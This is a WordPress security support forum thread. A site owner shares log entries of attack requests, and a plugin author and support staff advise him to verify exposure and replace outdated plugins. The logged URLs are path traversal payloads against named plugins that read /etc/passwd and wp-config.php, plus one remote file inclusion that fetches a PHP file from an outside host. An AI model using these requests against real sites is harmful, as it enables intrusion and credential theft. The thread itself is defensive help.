Live Traffic – Showing someone has accessed files

  • Resolved steve986

    (@steve986)


    3 years, 11 months ago

    Hi all,

    Ok I’m based in the UK and I have just checked the Live traffic and noticed that there are 7 entries from 3 days go from the Netherlands. These have a green dot next to them and word fence has classified them as human which is a bit concerning as they obviously have had access to the following… (I have removed my domain for obvious reasons).

    http://www ..co.uk/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../ect/passwd

    http://www ..co.uk/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../ect/passwd

    http://www ..co.uk/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/ect/passwd

    http://www ..co.uk/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

    http://www ..co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd

    http://www ..co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

    http://www ..co.uk/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.relationshiptips.club/cach/db.php

    Any advice on what I should do?

    Steve

    • This topic was modified 3 years, 11 months ago by steve986.
Viewing 8 replies - 1 through 8 (of 8 total)
  • Hannes Etzelstorfer

    (@haet)

    3 years, 11 months ago

    Hey Steve,
    One of the affected plugins ( wp-ecommerce-shop-styling ) is mine which I have closed around four years ago. I can remember this security issue but I have fixed it so if you use the latest version they should not have had access to the files.
    But maybe one of the other attacks did work.
    You can try the URLs one by one to see whether or not the attack delivered the requested files.
    You should definitely not use any plugins that are not supported anymore. Is WP E-Commerce still updated? I haven’t heard of it for years.
    best regards, Hannes

    Thread Starter steve986

    (@steve986)

    3 years, 11 months ago

    Hi Hannes,

    Really appreciate you taking the time to help me out.

    Well I basically downloaded a template from themeforest (themerex) and it features a woocommerce shop .

    I can only see Woocommerce and that’s up to-date I can’t see a plug in for E-commerce?

    Could you talk me through how I check each of the URL’s?

    Many thanks for your time

    Steve

    Hannes Etzelstorfer

    (@haet)

    3 years, 11 months ago

    copy each of the urls to your browser and see if you get the requested files so you know what the attacker got.

    Afterwards, please remove all plugins that are not updated anymore.

    Thread Starter steve986

    (@steve986)

    3 years, 11 months ago

    Hey Hannes,

    Thanks for that is it safe to paste the links in the browser or could anything nasty be in them if they have modified the files in anyway?

    Steve

    Hannes Etzelstorfer

    (@haet)

    3 years, 11 months ago

    It is not a risk to open the URLs in your browser.
    The URLs try to show your credentials. If any of them works the attacker may have access to your site and you should reinstall and clean up EVERYTHING immediately.

    Thread Starter steve986

    (@steve986)

    3 years, 11 months ago

    Hannes,

    I have checked everyone of those links and my security software has blocked me from accessing them warning me that they are malicious.

    I’ve also noticed that they all have 301 response codes next to the log entries.

    Steve

    WFGerroald

    (@wfgerald)

    3 years, 11 months ago

    Hey @steve986,

    I believe @haet is correct (and thanks for chiming in, we appreciate it :)). I was able to find each of these plugins with the exception of simple-image-manipulator. Each one of them is very old, not updated any longer, and even with only a quick glance most have had reported exploits. My best suggestion here is to make a backup, and update your site with software that’s currently supported. I’m sure you can find replacements for each.

    You might even get with a trusted web developer or hack repair service to make sure the site hasn’t been compromised.

    Once you’ve done this we can take a look if you’re still having an issue with Live Traffic. But at this point, with the information you’ve shared (I assume there’s likely more) there are too many other possible contributing factors here.

    Please make a backup, replace the software, and make sure all software on the site is up to date.

    Thanks,

    Gerroald

    WFGerroald

    (@wfgerald)

    3 years, 10 months ago

    Hey @steve986,

    We haven’t heard back from you in a while, so I’ve gone ahead and marked this thread as resolved.

    Please feel free to open another thread if you’re still having issues with Wordfence.

    Thanks,

    Gerroald

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘Live Traffic – Showing someone has accessed files’ is closed to new replies.